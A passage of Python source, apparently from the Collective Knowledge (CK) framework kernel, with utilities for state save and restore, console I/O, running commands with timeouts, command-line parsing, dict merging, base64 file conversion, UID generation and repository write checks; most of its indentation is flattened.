Output: dict with state
"""
import copy
import os
r={}
r['cfg']=copy.deepcopy(cfg)
r['paths_repos']=copy.deepcopy(paths_repos)
r['cache_repo_init']=cache_repo_init
r['paths_repos_all']=copy.deepcopy(paths_repos_all)
r['cache_repo_uoa']=copy.deepcopy(cache_repo_uoa)
r['cache_repo_info']=copy.deepcopy(cache_repo_info)
r['os.environ']=copy.deepcopy(os.environ)
return r
##############################################################################
# Restore CK state
#
# TARGET: end users
def restore_state(r):
"""
Input: dict with state
Output: output from "init" function
"""
global initialized, cfg, paths_repos, cache_repo_init, paths_repos_all, cache_repo_uoa, cache_repo_info
import copy
import os
cfg=r['cfg']
paths_repos=r['paths_repos']
cache_repo_init=r['cache_repo_init']
paths_repos_all=r['paths_repos_all']
cache_repo_uoa=r['cache_repo_uoa']
cache_repo_info=r['cache_repo_info']
os.environ=r['os.environ']
initialized=False
return init({})
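# A minimal save/restore sketch (illustrative; 'forbid_global_delete' is just an
# example of mutable kernel state, not a required key):
#   snapshot=save_state()
#   cfg['forbid_global_delete']='yes'   # temporary change to the kernel config
#   restore_state(snapshot)             # rolls back cfg/paths/env and re-initializes CK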
##############################################################################
# Reinitialize CK
#
# TARGET: end users
def reinit():
"""
Input: None
Output: output from "init" function
"""
global initialized, paths_repos, cache_repo_init, paths_repos_all, cache_repo_uoa, cache_repo_info
initialized=False
paths_repos=[]
cache_repo_init=False
paths_repos_all=[]
cache_repo_uoa={}
cache_repo_info={}
return init({})
##############################################################################
# Universal print of unicode string in utf8 that supports Python 2.x and 3.x
#
# TARGET: end users
def out(s):
"""
Input: s - unicode string to print
Output: Nothing
"""
if allow_print:
if con_encoding=='':
x=sys.stdin.encoding
if x==None:
b=s.encode()
else:
b=s.encode(x, 'ignore')
else:
b=s.encode(con_encoding, 'ignore')
if sys.version_info[0]>2:
try: # We encountered issues on ipython with Anaconda
                 # and hence added this workaround
sys.stdout.buffer.write(b)
sys.stdout.buffer.write(b'\n')
except Exception as e:
print(s)
pass
else:
print(b)
sys.stdout.flush()
return None
##############################################################################
# Universal debug print of a dictionary (removing unprintable parts)
#
# TARGET: end users
def debug_out(i):
"""
Input: i - dictionary
Output: return = 0
"""
import copy
import json
ii={}
# Check main unprintable keys
for k in i:
try:
s=json.dumps(i[k])
except Exception as e:
pass
else:
ii[k]=i[k]
# Dump
out(json.dumps(ii, indent=2))
return {'return':0}
##############################################################################
# Universal print of unicode error string in utf8 that supports Python 2.x and 3.x to stderr
#
# TARGET: end users
def eout(s):
"""
Input: s - unicode string to print
Output: Nothing
"""
if allow_print:
if con_encoding=='':
x=sys.stdin.encoding
if x==None:
b=s.encode()
else:
b=s.encode(x, 'ignore')
else:
b=s.encode(con_encoding, 'ignore')
if sys.version_info[0]>2:
try: # We encountered issues on ipython with Anaconda
                 # and hence added this workaround
sys.stderr.buffer.write(b)
sys.stderr.buffer.write(b'\n')
except Exception as e:
sys.stderr.write(s)
pass
else:
sys.stderr.write(b)
sys.stderr.flush()
return None
##############################################################################
# Universal error print and exit
#
# TARGET: end users
def err(r):
"""
Input: {
return - return code
error - error text
}
Output: Nothing; quits program
"""
import sys
rc=r['return']
re=r['error']
out('Error: '+re)
sys.exit(rc)
##############################################################################
# Universal error print for Jupyter Notebook with raise KeyboardInterrupt
#
# TARGET: end users
def jerr(r):
"""
Input: {
return - return code
error - error text
}
Output: Nothing; quits program
"""
rc=r['return']
re=r['error']
out('Error: '+re)
raise KeyboardInterrupt
##############################################################################
# Support function for safe float (useful for sorting function)
#
# TARGET: end users
def safe_float(i,d):
r=d
try:
r=float(i)
except Exception as e:
pass
return r
##############################################################################
# Support function to lower values in a list
#
# TARGET: internal
def lower_list(lst):
nlst=[]
for v in lst:
nlst.append(v.lower())
return nlst
##############################################################################
# Support function for checking the directory-split number for an entry
#
# TARGET: CK kernel and low-level developers
def get_split_dir_number(repo_dict, module_uid, module_uoa):
# Check if there is a split of directories for this module in local config
# to handle numerous entries (similar to MediaWiki)
found=False
split_dir_number=0
# Check global split for all repositories (in cfg) or for a given repo
for xcfg in [cfg, repo_dict]:
x=xcfg.get('split_all_dirs','')
if x!='':
x=safe_int(x,0)
if x!=0:
found=True
split_dir_number=x
break
# Check split per module
if not found:
for xcfg in [cfg, repo_dict]:
xsplit_dirs=xcfg.get('split_dirs',{})
found=False
for m in [module_uid, module_uoa]:
x=safe_int(xsplit_dirs.get(m,0),0)
if x!=0:
split_dir_number=x
found=True
break
if found:
break
return split_dir_number
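# A minimal sketch of how a repo config enables directory splitting (illustrative
# dict and UID; the per-module 'split_dirs' value is used when 'split_all_dirs' is unset):
#   rd={'split_dirs':{'experiment':2}}
#   get_split_dir_number(rd, 'bc0409fb61f0aa82', 'experiment')   # -> 2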
##############################################################################
# Support function for splitting entry name
#
# TARGET: CK kernel and low-level developers
def split_name(name, number):
sd1=name
sd2=''
if number!='':
number=int(number)
if number!=0:
if len(name)>number:
sd1=name[:number]
sd2=name[number:]
else:
sd1='_'
sd2=name
return (sd1,sd2)
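# Illustrative examples (hypothetical entry names):
#   split_name('1e477bb8812d5295', 4)   # -> ('1e47', '7bb8812d5295')
#   split_name('abc', 4)                # -> ('_', 'abc') since the name is too short to split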
##############################################################################
# Support function for checking whether to index data or not ...
#
# TARGET: CK kernel and low-level developers
def index_module(module_uoa, repo_uoa):
ret=True
# First check if index the whole repo
ir=cfg.get('index_repos',[])
if len(ir)>0 and repo_uoa!='':
if repo_uoa in ir:
return ret
im=cfg.get('index_modules',[])
# Next check if index module (if im is empty index all)
if len(im)>0:
ret=False
if module_uoa in im:
ret=True
return ret
##############################################################################
# Support function for safe int (useful for sorting function)
#
# TARGET: end users
def safe_int(i,d):
r=d
try:
r=int(i)
except Exception as e:
pass
return r
##############################################################################
# Support function to get value from list without error if out of bounds
# (useful for various sorting)
#
# TARGET: end users
def safe_get_val_from_list(lst, index, default_value):
v=default_value
if index<len(lst):
v=lst[index]
return v
##############################################################################
# Support function for system_with_timeout
#
# TARGET: end users
def system_with_timeout_kill(proc):
# First via psutil (works better on Windows but may not be installed)
loaded=True
try:
import psutil
except ImportError:
loaded=False
pass
if loaded: # pragma: no cover
try:
pid=proc.pid
p=psutil.Process(pid)
pc=p.get_children(recursive=True)
for px in pc:
px.kill()
p.kill()
except Exception as e:
loaded=False
pass
# Try traditional way
if not loaded:
try:
proc.terminate()
except Exception as e:
pass
return
##############################################################################
# Substitute for os.system with an optional timeout
#
# TARGET: end users
def system_with_timeout(i):
"""
Input: {
cmd - command line
              (timeout)       - timeout in seconds (granularity 0.1 sec) - may cause overheads ...
}
Output: {
return - return code = 0, if successful
> 0, if error
= 8, if timeout
(error) - error text if return > 0
return_code - return code from app
}
"""
import subprocess
import time
cmd=i['cmd']
rc=0
to=i.get('timeout','')
p=subprocess.Popen(cmd, shell=True)
if to != '':
xto=float(to)
t0=time.time()
t=0
tx=float(i['timeout'])
while p.poll() == None and t<xto:
time.sleep(0.1)
t=time.time()-t0
if t>=xto and p.poll()==None:
          system_with_timeout_kill(p)
          return {'return':8, 'error':'process timed out and was terminated'}
else:
p.wait()
rc=p.returncode
return {'return':0, 'return_code':rc}
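# A usage sketch (illustrative; assumes a POSIX 'sleep' command is available):
#   r=system_with_timeout({'cmd':'sleep 5', 'timeout':'1'})
#   # -> {'return':8, 'error':'process timed out and was terminated'}
#   r=system_with_timeout({'cmd':'echo ok'})
#   # -> {'return':0, 'return_code':0}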
##############################################################################
# Run command and get stdout
#
# TARGET: end users
def run_and_get_stdout(i):
"""
Input: {
cmd [list] - list of command line arguments, starting with the command itself
(shell) - if 'yes', reuse shell environment
}
Output: {
return - return code = 0, if successful
> 0, if error
= 8, if timeout
(error) - error text if return > 0
return_code - return code from app
stdout - string, standard output of the command
stderr - string, standard error of the command
}
"""
import subprocess
import shlex
import platform
cmd=i['cmd']
if type(cmd)!=list:
# Split only on non-Windows platforms (since Windows takes a string in Popen)
if not platform.system().lower().startswith('win'):
cmd=shlex.split(cmd)
xshell=False
if i.get('shell','')=='yes':
xshell=True
p1 = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=xshell)
output, error = p1.communicate()
if sys.version_info[0]>2:
try:
output = output.decode(encoding='UTF-8')
except Exception as e:
return {'return':1, 'error':'problem encoding stdout ('+format(e)+')'}
try:
error = error.decode(encoding='UTF-8')
except Exception as e:
return {'return':1, 'error':'problem encoding stderr ('+format(e)+')'}
return {'return':0, 'return_code':p1.returncode, 'stdout':output, 'stderr':error}
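# A usage sketch (illustrative command):
#   r=run_and_get_stdout({'cmd':['echo','hello']})
#   # r['return']==0, r['return_code']==0, r['stdout']=='hello\n'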
##############################################################################
# Get value from one dict, remove it from there and move to another
#
# TARGET: end users
def get_from_dicts(dict1, key, default_value, dict2, extra=''):
"""
Input: dict1 - first check in this dict (and remove if there)
key - key in dict1
default_value - default value if not found
dict2 - then check from here
Output: value
"""
value=default_value
if key not in dict1:
if dict2!=None:
value=dict2.get(extra+key, default_value)
else:
value=dict1[key]
del(dict1[key])
if dict2!=None:
dict2[extra+key]=value
return value
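# Illustrative example: pop 'out' from the first dict and mirror it into the second
#   d1={'out':'con', 'x':1}; d2={}
#   get_from_dicts(d1, 'out', '', d2)   # -> 'con'; now d1=={'x':1} and d2=={'out':'con'}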
##############################################################################
# Converting iso text time to datetime object
#
# TARGET: end users
def convert_iso_time(i):
"""
Input: {
iso_datetime - iso date time
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
(datetime_obj) - datetime object
}
"""
    t=i['iso_datetime']

    import datetime

    # Try progressively less precise ISO formats until one matches
    dto=None
    for fmt in ("%Y-%m-%dT%H:%M:%S.%f", "%Y-%m-%dT%H:%M:%S", "%Y-%m-%dT%H:%M",
                "%Y-%m-%dT%H", "%Y-%m-%d", "%Y-%m", "%Y"):
        try:
            dto=datetime.datetime.strptime(t, fmt)
            break
        except Exception as e:
            pass

    if dto==None:
        return {'return':1, 'error':'can\'t parse ISO date time: '+t}

    return {'return':0, 'datetime_obj':dto}
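# Illustrative example (hypothetical timestamp):
#   r=convert_iso_time({'iso_datetime':'2016-09-07T13:47:34.5'})
#   # r['return']==0 and r['datetime_obj'] is a datetime.datetime instance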
##############################################################################
# Safely convert dict string keys to int for sorting
#
# TARGET: end users
def convert_str_key_to_int(key):
try:
return int(key)
except ValueError:
return 0
##############################################################################
# Universal input of unicode string in utf8 that supports Python 2.x and 3.x
#
# TARGET: end users
def inp(i):
"""
Input: {
text - text to print
}
Output: {
return - return code = 0
string - input string
}
"""
t=i['text']
if con_encoding=='':
x=sys.stdin.encoding
if x==None:
b=t.encode()
else:
b=t.encode(x, 'ignore')
else:
b=t.encode(con_encoding, 'ignore') # pragma: no cover
if sys.version_info[0]>2:
try: b=b.decode(sys.stdin.encoding)
except Exception as e:
try: b=b.decode('utf8')
except Exception as e: pass
if sys.version_info[0]>2:
s=input(b)
else:
x=sys.stdin.encoding
if x==None:
x='utf8'
s=raw_input(b).decode(x).encode('utf8')
return {'return':0, 'string':s}
##############################################################################
# Universal selector of dictionary entry
#
# TARGET: end users (advanced version available in module "choice")
def select(i):
"""
Input: {
dict - dict with values being dicts with 'name' as string to display and 'sort' as int (for ordering)
(title) - print title
(error_if_empty) - if 'yes' and Enter, make error
(skip_sort) - if 'yes', do not sort array
}
Output: {
return - return code = 0
string - selected dictionary key
}
"""
s=''
title=i.get('title','')
if title!='':
out(title)
out('')
d=i['dict']
if i.get('skip_sort','')!='yes':
kd=sorted(d, key=lambda v: d[v].get('sort',0))
else:
kd=d
j=0
ks={}
for k in kd:
q=d[k]
sj=str(j)
ks[sj]=k
qn=q.get('name','')
out(sj+') '+qn)
j+=1
out('')
rx=inp({'text':'Make your selection (or press Enter for 0): '})
if rx['return']>0: return rx
sx=rx['string'].strip()
if sx=='':
if i.get('error_if_empty','')=='yes':
return {'return':1, 'error':'selection is empty'}
s=kd[0]
else:
if sx not in ks:
return {'return':1, 'error':'selection is not recognized'}
s=ks[sx]
return {'return':0, 'string':s}
##############################################################################
# Universal UOA selector
#
# TARGET: end users (advanced version available in module "choice")
def select_uoa(i):
"""
Input: {
choices - list from search function
(skip_enter) - if 'yes', do not select 0 when user presses Enter
(skip_sort) - if 'yes', do not sort array
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
choice - data UOA
}
"""
se=i.get('skip_enter','')
lst=i.get('choices',[])
if i.get('skip_sort','')!='yes':
klst=sorted(lst, key=lambda v: v['data_uoa'])
else:
klst=lst
zz={}
iz=0
for z1 in klst:
z=z1['data_uid']
zu=z1['data_uoa']
zs=str(iz)
zz[zs]=z
out(zs+') '+zu+' ('+z+')')
iz+=1
out('')
y='Select UOA'
if se!='yes': y+=' (or press Enter for 0)'
y+=': '
rx=inp({'text':y})
x=rx['string'].strip()
if x=='' and se!='yes': x='0'
if x not in zz:
return {'return':1, 'error':'number is not recognized'}
dduoa=zz[x]
return {'return':0, 'choice':dduoa}
##############################################################################
# Convert string to list
#
# TARGET: end users
def convert_str_tags_to_list(i):
"""
Input: either a list, or a string of comma-separated tags.
Output: If i is a list, it's returned.
If i is a string, the list of tags it represents is returned
(each tag is stripped of leading and trailing whitespace).
"""
r=[]
if type(i)==list:
r=i
else:
ii=i.split(',')
for q in ii:
q=q.strip()
if q!='':
r.append(q)
return r
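# Illustrative examples:
#   convert_str_tags_to_list('opencl, cuda ,')   # -> ['opencl', 'cuda']
#   convert_str_tags_to_list(['opencl'])         # -> ['opencl'] (lists pass through unchanged)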
##############################################################################
# Check writing possibility
#
# TARGET: CK kernel and low-level developers
def check_writing(i):
"""
Input: {
(module_uoa)
(module_uid)
(repo_uoa)
(repo_uid)
(repo_dict)
(delete) - if 'yes', check if global delete operation is allowed
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
(repo_dict) - repo cfg if available
}
"""
dl=i.get('delete','')
if dl=='yes' and cfg.get('forbid_global_delete','')=='yes':
return {'return':1, 'error':'delete/rename operations are forbidden'}
if cfg.get('forbid_global_writing','')=='yes':
return {'return':1, 'error':'global writing is forbidden'}
if len(i)==0:
return {'return':0} # Check only global writing
if cfg.get('forbid_writing_modules','')=='yes':
muoa=i.get('module_uoa','')
muid=i.get('module_uid','')
if muoa==cfg['module_name'] or (muid!='' and muid in cfg['module_uids']):
return {'return':1, 'error':'writing/changing modules is forbidden'}
ruoa=i.get('repo_uoa','')
ruid=i.get('repo_uid','')
if cfg.get('forbid_writing_to_default_repo','')=='yes':
if ruoa==cfg['repo_name_default'] or ruid==cfg['repo_uid_default']:
return {'return':1, 'error':'writing to default repo is forbidden'}
if cfg.get('forbid_writing_to_local_repo','')=='yes':
if ruoa==cfg['repo_name_local'] or ruid==cfg['repo_uid_local']:
return {'return':1, 'error':'writing to local repo is forbidden'}
rr={'return':0}
# Load info about repo
rd={}
if ruoa!='':
if 'repo_dict' in i:
rd=i['repo_dict']
else:
rx=load_repo_info_from_cache({'repo_uoa':ruoa})
if rx['return']>0: return rx
rd=rx.get('dict',{})
rr['repo_dict']=rd
if cfg.get('allow_writing_only_to_allowed','')=='yes':
if rd.get('allow_writing','')!='yes':
return {'return':1, 'error':'writing to this repo is forbidden'}
if rd.get('forbid_deleting','')=='yes' and dl=='yes':
return {'return':1, 'error':'deleting in this repo is forbidden'}
return rr
##############################################################################
# Get CK version
#
# TARGET: end users
def get_version(i):
"""
Input: {}
Output: {
return - return code = 0
version - list starting from major version number
version_str - version string
}
"""
import copy
s=''
x=copy.deepcopy(cfg['version'])
for q in x:
if s!='': s+='.'
s+=str(q)
return {'return':0, 'version':x, 'version_str':s}
##############################################################################
# Generate temporary files
#
# TARGET: end users
def gen_tmp_file(i):
"""
Input: {
(suffix) - temp file suffix
(prefix) - temp file prefix
(remove_dir) - if 'yes', remove dir
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
file_name - temp file name
}
"""
xs=i.get('suffix','')
xp=i.get('prefix','')
s=i.get('string','')
import tempfile
fd, fn=tempfile.mkstemp(suffix=xs, prefix=xp)
os.close(fd)
os.remove(fn)
if i.get('remove_dir','')=='yes':
fn=os.path.basename(fn)
return {'return':0, 'file_name':fn}
##############################################################################
# Get host platform (currently win or linux) and OS bits
#
# TARGET: end users
def get_os_ck(i):
"""
Input: {
(bits) - force OS bits
}
Output: {
return - return code = 0
platform - 'win' or 'linux'
bits - OS bits in string: 32 or 64
python_bits - Python installation bits in string: 32 or 64
}
"""
import os
import platform
import struct
pbits=str(8 * struct.calcsize("P"))
plat='linux'
if platform.system().lower().startswith('win'): # pragma: no cover
plat='win'
obits=i.get('bits','')
if obits=='':
obits='32'
if plat=='win':
# Trying to get fast way to detect bits
if os.environ.get('ProgramW6432','')!='' or os.environ.get('ProgramFiles(x86)','')!='': # pragma: no cover
obits='64'
else:
# On Linux use first getconf LONG_BIT and if doesn't work use python bits
obits=pbits
r=gen_tmp_file({})
if r['return']>0: return r
fn=r['file_name']
cmd='getconf LONG_BIT > '+fn
rx=os.system(cmd)
if rx==0:
r=load_text_file({'text_file':fn,
'delete_after_read':'yes'})
if r['return']==0:
s=r['string'].strip()
if len(s)>0 and len(s)<4:
obits=s
return {'return':0, 'platform':plat, 'bits':obits, 'python_bits':pbits}
##############################################################################
# Generate CK UID
#
# TARGET: end users
def gen_uid(i):
"""
Input: {}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
data_uid - UID in string format (16 characters 0..9,a..f)
}
"""
import uuid
import random
uid=str(uuid.uuid4().hex)
if len(uid)!=32:
return {'return':1, 'error':'problem generating UID : len='+str(len(uid))+' !=32'} # pragma: no cover
    random.seed()
x=random.randrange(0,16)
return {'return':0, 'data_uid':uid[x:x+16]}
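# A usage sketch (the UID below is illustrative, not a reserved value):
#   r=gen_uid({})
#   # r['data_uid'] is a random 16-character hex string, e.g. '1e477bb8812d5295'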
##############################################################################
# Check if string is CK UID
#
# TARGET: end users
def is_uid(str):
"""
Input: string to check
Output: True if UID, otherwise False
"""
import re
if len(str)!=16:
return False
pattern = r'[^\.a-f0-9]'
if re.search(pattern, str.lower()):
return False
return True
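# Illustrative checks:
#   is_uid('1e477bb8812d5295')   # -> True  (16 hex characters)
#   is_uid('demo')               # -> False (wrong length)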
##############################################################################
# Check if string is correct CK UOA
# (i.e. does not have special characters including *, ?)
#
# TARGET: end users
def is_uoa(str):
"""
Input: string to check
Output: True if allowed UOA, False otherwise
"""
if str.find(cfg['detect_cur_cid'])>=0 or str.find(cfg['detect_cur_cid1'])>=0: return False
if str.find('*')>=0: return False
if str.find('?')>=0: return False
return True
##############################################################################
# Prepare special info about entry (engine used, author, date, etc)
#
# TARGET: CK kernel and low-level developers
def prepare_special_info_about_entry(i):
"""
Input: {
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
dict - dict with info
}
"""
# Add control info
d={'engine':'CK',
'version':cfg['version']}
if cfg.get('default_developer','')!='':
d['author']=cfg['default_developer']
if cfg.get('default_developer_email','')!='':
d['author_email']=cfg['default_developer_email']
if cfg.get('default_developer_webpage','')!='':
d['author_webpage']=cfg['default_developer_webpage']
if cfg.get('default_license','')!='':
d['license']=cfg['default_license']
if cfg.get('default_copyright','')!='':
d['copyright']=cfg['default_copyright']
r=get_current_date_time({})
d['iso_datetime']=r['iso_datetime']
return {'return':0, 'dict': d}
##############################################################################
def load_json_file(i):
import ck.files
return ck.files.load_json_file(i)
##############################################################################
def save_json_to_file(i):
import ck.files
return ck.files.save_json_to_file(i)
##############################################################################
def load_yaml_file(i):
import ck.files
return ck.files.load_yaml_file(i)
##############################################################################
def save_yaml_to_file(i):
import ck.files
return ck.files.save_yaml_to_file(i)
##############################################################################
def load_text_file(i):
import ck.files
return ck.files.load_text_file(i)
##############################################################################
def save_text_file(i):
import ck.files
return ck.files.save_text_file(i)
##############################################################################
# Substitute string in file
#
# TARGET: end users
def substitute_str_in_file(i):
"""
Input: {
filename - file
string1 - string to be replaced
string2 - replace string
}
Output: {
return - return code = 0, if successful
= 16, if file not found
> 0, if error
(error) - error text if return > 0
}
"""
fn=i['filename']
s1=i['string1']
s2=i['string2']
# Load text file (unicode)
r=load_text_file({'text_file':fn})
if r['return']>0: return r
# Replace
x=r['string']
x=x.replace(s1,s2)
# Save text file (unicode)
r=save_text_file({'text_file':fn, 'string':x})
if r['return']>0: return r
return {'return':0}
##############################################################################
# Deprecated
def dumps_json(i):
import ck.strings
return ck.strings.dump_json(i)
##############################################################################
def dump_json(i):
import ck.strings
return ck.strings.dump_json(i)
##############################################################################
def copy_to_clipboard(i): # pragma: no cover
import ck.strings
return ck.strings.copy_to_clipboard(i)
##############################################################################
def convert_json_str_to_dict(i):
import ck.strings
return ck.strings.convert_json_str_to_dict(i)
##############################################################################
# Merge intelligently dict1 with dict2 key by key in contrast with dict1.update(dict2)
#
# TARGET: end users
def merge_dicts(i):
"""
Input: {
dict1 - merge this dict with dict2 (will be directly modified!)
              dict2 - dict
            }
Output: {
return - return code = 0, if successful
dict1 - output dict
}
"""
a=i['dict1']
b=i['dict2']
for k in b:
v=b[k]
if type(v) is dict:
if k not in a:
a.update({k:b[k]})
elif type(a[k])==dict:
merge_dicts({'dict1':a[k], 'dict2':b[k]})
else:
a[k]=b[k]
elif type(v) is list:
a[k]=[]
for y in v:
a[k].append(y)
else:
a[k]=b[k]
return {'return':0, 'dict1':a}
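# Illustrative example: nested dicts are merged key by key, lists and scalars are replaced
#   a={'tags':['x'], 'env':{'A':1}}
#   merge_dicts({'dict1':a, 'dict2':{'tags':['y'], 'env':{'B':2}}})
#   # a=={'tags':['y'], 'env':{'A':1, 'B':2}}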
##############################################################################
# Convert file to upload string
#
# TARGET: end users
def convert_file_to_upload_string(i):
"""
Input: {
filename - file name to convert
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
file_content_base64 - string that can be transmitted through Internet
}
"""
import base64
fn=i['filename']
if not os.path.isfile(fn):
return {'return':1, 'error':'file '+fn+' not found'}
s=b''
try:
f=open(fn, 'rb')
       while True:
          x = f.read(32768)
          if not x: break
          s+=x
f.close()
except Exception as e:
return {'return':1, 'error':'error reading file ('+format(e)+')'}
s=base64.urlsafe_b64encode(s).decode('utf8')
return {'return':0, 'file_content_base64': s}
##############################################################################
# Convert upload string to file
#
# TARGET: end users
def convert_upload_string_to_file(i):
"""
Input: {
file_content_base64 - string transmitted through Internet
(filename) - file name to write (if empty, generate tmp file)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
filename - filename with full path
filename_ext - filename extension
}
"""
import base64
x=i['file_content_base64']
fc=base64.urlsafe_b64decode(str(x)) # convert from unicode to str since base64 works on strings
# should be safe in Python 2.x and 3.x
fn=i.get('filename','')
if fn=='':
rx=gen_tmp_file({'prefix':'tmp-'})
if rx['return']>0: return rx
px=rx['file_name']
else:
px=fn
fn1, fne = os.path.splitext(px)
if os.path.isfile(px):
return {'return':1, 'error':'file already exists in the current directory'}
try:
fx=open(px, 'wb')
fx.write(fc)
fx.close()
except Exception as e:
return {'return':1, 'error':'problem writing file='+px+' ('+format(e)+')'}
return {'return':0, 'filename':px, 'filename_ext': fne}
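# A round-trip sketch (hypothetical file names):
#   r=convert_file_to_upload_string({'filename':'meta.json'})
#   s=r['file_content_base64']
#   convert_upload_string_to_file({'file_content_base64':s, 'filename':'copy.json'})
#   # writes 'copy.json' (fails with an error if the file already exists)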
##############################################################################
# Input JSON from console (double enter to finish)
#
# TARGET: end users
def input_json(i):
"""
Input: {
text - text to print
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
string
dict - parsed JSON
}
"""
t=i['text']
out(t)
s=''
while True:
r=inp({'text':''})
if r['return']>0: return r
ss=r['string'].strip()
if ss=='': break
s+=ss
s=s.strip()
if s=='': s='{}' # empty json
else:
if not s.startswith('{'): s='{'+s
if not s.endswith('}'): s+='}'
r=convert_json_str_to_dict({'str':s, 'skip_quote_replacement':'yes'})
if r['return']>0: return r
d=r['dict']
return {'return':0, 'string': s, 'dict':d}
##############################################################################
# Convert CK list to CK dict with unicode in UTF-8 (unification of interfaces)
#
# TARGET: CK kernel and low-level developers
def convert_ck_list_to_dict(i):
"""
Input: [
CK list: see 'action' function from this kernel
]
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
ck_dict - {
"action":action
"cid":module_uoa or CID (x means that it may not be really CID
and has to be processed specially
"cids":[cid1, cid2, cid3, ...]
"key1":value1
"key2":value2
...
"key10":""
"key11":value11
keys/values from file_json; if file extension is .tmp,
it will be deleted after read!
keys/values from cmd_json
"unparsed":unparsed_cmd
}
"""
obj={}
obj['cids']=[]
l=len(i)
if l>0: obj['action']=i[0]
module_uoa_or_cid=''
# Parsing
cx=True # Start first processing CIDs and then turn it off when something else is encountered
if l>1:
for x in range(1, len(i)):
p=i[x].rstrip()
#####################################
if p=='--':
cx=False
p2=i[x+1:]
obj['unparsed']=p2
break
#####################################
elif p.startswith('--'):
cx=False
p=p[2:]
p1=p
p2='yes'
q=p.find("=")
if q>0:
p1=p[0:q]
if len(p)>q:
p2=p[q+1:]
obj[p1]=p2
#####################################
elif p.startswith('-'):
cx=False
p=p[1:]
p1=p
p2='yes'
q=p.find("=")
if q>0:
p1=p[0:q]
if len(p)>q:
p2=p[q+1:]
obj[p1]=p2
#####################################
elif p.startswith("@@@"):
cx=False
jd=p[3:]
if len(jd)<3:
return {'return':1, 'error':'can\'t parse command line option '+p}
y=convert_json_str_to_dict({'str':jd})
if y['return']>0: return y
merge_dicts({'dict1':obj, 'dict2':y['dict']})
#####################################
elif p.startswith("@@"):
cx=False
key=p[2:]
x='Add JSON to input'
if key!='': x+=' for key "'+key+'"'
x+=' (double Enter to stop):\n'
rx=input_json({'text':x})
if rx['return']>0: return rx
dy=rx['dict']
dx=obj
if key!='':
if key not in obj: obj[key]={}
dx=obj[key]
merge_dicts({'dict1':dx, 'dict2':dy})
#####################################
elif p.startswith("@"):
cx=False
name=p[1:]
if len(name)<2:
return {'return':1, 'error':'can\'t parse command line option '+p}
y=load_json_file({'json_file':name})
if y['return']>0: return y
if name.endswith('.tmp'):
os.remove(name)
merge_dicts({'dict1':obj, 'dict2':y['dict']})
#####################################
elif p.find('=')>=0:
cx=False
p1=p
p2=''
q=p.find("=")
if q>0:
p1=p[0:q]
if len(p)>q:
p2=p[q+1:]
obj[p1]=p2
#####################################
else:
# If no module_uoa_or_cid -> set it
if module_uoa_or_cid=='':
module_uoa_or_cid=p
else:
# Otherwise add to CIDs
obj['cids'].append(p)
if module_uoa_or_cid!='': obj['cid']=module_uoa_or_cid
return {'return':0, 'ck_dict':obj}
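# Illustrative parse of a CK command line (hypothetical CIDs):
#   r=convert_ck_list_to_dict(['add', 'program:demo', '--tags=opencl', 'experiment:test'])
#   # r['ck_dict']=={'action':'add', 'cid':'program:demo',
#   #                'cids':['experiment:test'], 'tags':'opencl'}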
##############################################################################
# Init CK (current instance - has state!)
#
# TARGET: internal use
def init(i): # pragma: no cover
"""
Input: {}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
global cfg, work, initialized, paths_repos, type_long, string_io, log_ck_entries
if initialized:
return {'return':0}
# Add this path to syspath to be able to call other modules
    this_kernel_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, this_kernel_dir)
# Split version
cfg['version']=__version__.split('.')
# Default URL. FIXME: should be formed from wfe_host and wfe_port when they are known.
# cfg['wfe_url_prefix'] = 'http://%s:%s/web?' % (cfg['default_host'], cfg['default_port'])
# Check long/int types
try:
x=long
except Exception as e:
type_long=int
else:
type_long=long
# Import StringIO
if sys.version_info[0]>2:
import io
string_io=io.StringIO
else:
from StringIO import StringIO
string_io=StringIO
# Check where are repos (to keep compatibility with past CK < V1.5)
p=''
searched_places=[]
import inspect
pxx=os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
px=os.path.dirname(pxx)
py=os.path.join(pxx, cfg['subdir_default_repo'])
searched_places.append(py)
if os.path.isdir(py):
p=py
if p=='':
from distutils.sysconfig import get_python_lib
px=get_python_lib()
py=os.path.join(px, cfg['kernel_dir'], cfg['subdir_default_repo'])
searched_places.append(py)
if os.path.isdir(py):
p=py
if p=='':
import site
for px in site.getsitepackages():
py=os.path.join(px, cfg['kernel_dir'],cfg['subdir_default_repo'])
searched_places.append(py)
if os.path.isdir(py):
p=py
break
# Check CK_ROOT environment variable
s=os.environ.get(cfg['env_key_root'],'').strip()
if s!='':
work['env_root']=os.path.realpath(s)
       for px in cfg['kernel_dirs']:
           # Compute the candidate path first, then record it as a searched place
           py=os.path.join(work['env_root'], px, cfg['subdir_default_repo'])
           searched_places.append(py)
           if os.path.isdir(py):
              p=py
              break
elif px!='':
work['env_root']=px
# Get home user directory
from os.path import expanduser
home=expanduser("~")
# Check default repo
x=os.environ.get(cfg['env_key_default_repo'],'').strip()
if x!='' and os.path.isdir(x):
work['dir_default_repo']=x
else:
if p=='':
# Attempt to find in userspace (since V1.11.2.1)
x=os.path.join(home, '.ck', __version__, cfg['subdir_default_repo'])
if os.path.isfile(os.path.join(x, cfg['repo_file'])):
p=x
if p=='':
return {'return':1, 'error':'Unusual CK installation detected since we can\'t find the CK package path with the default repo (searched in '+str(searched_places)+'). It often happens when you install CK under root while other tools (which use CK) under user and vice versa. Please reinstall other tools that use CK in the same way as CK (root or user). If the problem persists, please report to the author (<EMAIL>).'}
work['dir_default_repo']=p
work['dir_default_repo_path']=os.path.join(work['dir_default_repo'], cfg['module_repo_name'], cfg['repo_name_default'])
work['dir_default_kernel']=os.path.join(work['dir_default_repo'], cfg['subdir_kernel'])
